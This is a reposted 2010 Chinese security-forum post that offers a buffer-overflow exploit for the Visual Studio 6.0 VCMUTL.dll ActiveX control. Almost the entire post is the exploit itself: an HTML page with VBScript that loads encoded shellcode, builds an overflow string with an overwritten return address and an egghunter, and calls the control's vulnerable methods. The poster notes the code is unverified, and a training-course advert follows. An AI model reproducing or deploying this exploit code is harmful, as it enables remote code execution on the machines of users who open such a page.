[转帖]Visual Studio 6.0 (VCMUTL.dll) ActiveX 存在缓冲溢出漏洞-二进制漏洞-看雪-安全社区|安全招聘|kanxue.com

[转帖]Visual Studio 6.0 (VCMUTL.dll) ActiveX 存在缓冲溢出漏洞

2010-7-28 15:51 3039

[转帖]Visual Studio 6.0 (VCMUTL.dll) ActiveX 存在缓冲溢出漏洞

freebsdlin 活跃值

2010-7-28 15:51

3039

  

Exploit:  

<html>  

<object classid='clsid:723AA6D1-3B50-11D1-9636-00600818410C' id='target'></object>  

<script language='vbscript'>  

   

shellcode = unescape("%u7a44%u3732%u7a44%u3732%u03eb%ueb59%ue805%ufff8%uffff") & _  

            unescape("%u494f%u4949%u4949%u5149%u565a%u5854%u3336%u5630%u3458") & _  

            unescape("%u3041%u3642%u4848%u4230%u3033%u4342%u5856%u4232%u4244") & _  

            unescape("%u3448%u3241%u4441%u4130%u5444%u4442%u4251%u4130%u4144") & _  

            unescape("%u5856%u5a34%u4238%u4a44%u4d4f%u4f4e%u4e4a%u3446%u5042") & _  

            unescape("%u5042%u5042%u384b%u3445%u534e%u584b%u374e%u3045%u574a") & _  

            unescape("%u3041%u4e4f%u384b%u344f%u314a%u584b%u454f%u3242%u3041") & _  

            unescape("%u4e4b%u3449%u584b%u3346%u484b%u3041%u4e50%u5341%u4c42") & _  

            unescape("%u4949%u4a4e%u4846%u4c42%u5746%u3047%u4c41%u4c4c%u304d") & _  

            unescape("%u3041%u4c44%u4e4b%u4f46%u434b%u5546%u3246%u3046%u5745") & _  

            unescape("%u4e45%u584b%u454f%u3246%u5041%u4e4b%u3648%u584b%u304e") & _  

            unescape("%u544b%u584b%u554f%u514e%u5041%u4e4b%u484b%u414e%u484b") & _  

            unescape("%u3041%u4e4b%u5849%u454e%u5246%u5046%u4c43%u5341%u4c42") & _  

            unescape("%u4646%u384b%u3442%u5342%u4845%u4c42%u574a%u304e%u484b") & _  

            unescape("%u3442%u504e%u384b%u5742%u314e%u4a4d%u584b%u364a%u304a") & _  

            unescape("%u4e4b%u5049%u484b%u5842%u4b42%u3042%u3042%u3042%u384b") & _  

            unescape("%u464a%u334e%u454f%u5341%u4f48%u4642%u5548%u3849%u4f4a") & _  

            unescape("%u4843%u4c42%u474b%u3542%u564a%u5750%u4d4a%u4e44%u3743") & _  

            unescape("%u364a%u494a%u4f50%u384c%u5050%u4547%u4f4f%u4e47%u5643") & _  

            unescape("%u4641%u364e%u5643%u5042%u5a5a")  

   

buffer1 = string(262, "A")  

ecx = unescape("%u0090%u0090")  

eip = unescape("%u048b%u0041") ' eip = unescape("%u048b%u0041") <--- (sp3 en) # eip = unescape("%u048b%u0041") <--- (sp3 fr)  

fill = string(4, "A")  

nop = string(600, "A")  

   

egg = egg + "TUYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARA"  

egg = egg + "LAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQI"  

egg = egg + "AIQI111AIAJQYAZBABABABABkMAGB9u4JBaVRaxJYoLOm"  

egg = egg + "rpRbJKR0XvmLnmlKUNzSDhotxOTsJNRnWdKXzTo3EzJvO"  

egg = egg + "bUWwyoWwZjA"  

   

exploit = buffer1 + eip + fill + ecx + egg  

target.IsRegisterableDll shellcode  

target.IsRegisterableDll shellcode  

target.IsRegisterableDll shellcode  

target.RegisterApplication exploit   

</script>  

</html>

代码未验证

[培训]二进制漏洞攻防（第3期）；满10人开班；模糊测试与工具使用二次开发；网络协议漏洞挖掘；Linux内核漏洞挖掘与利用；AOSP漏洞挖掘与利用；代码审计。

收藏・1

点赞・0

打赏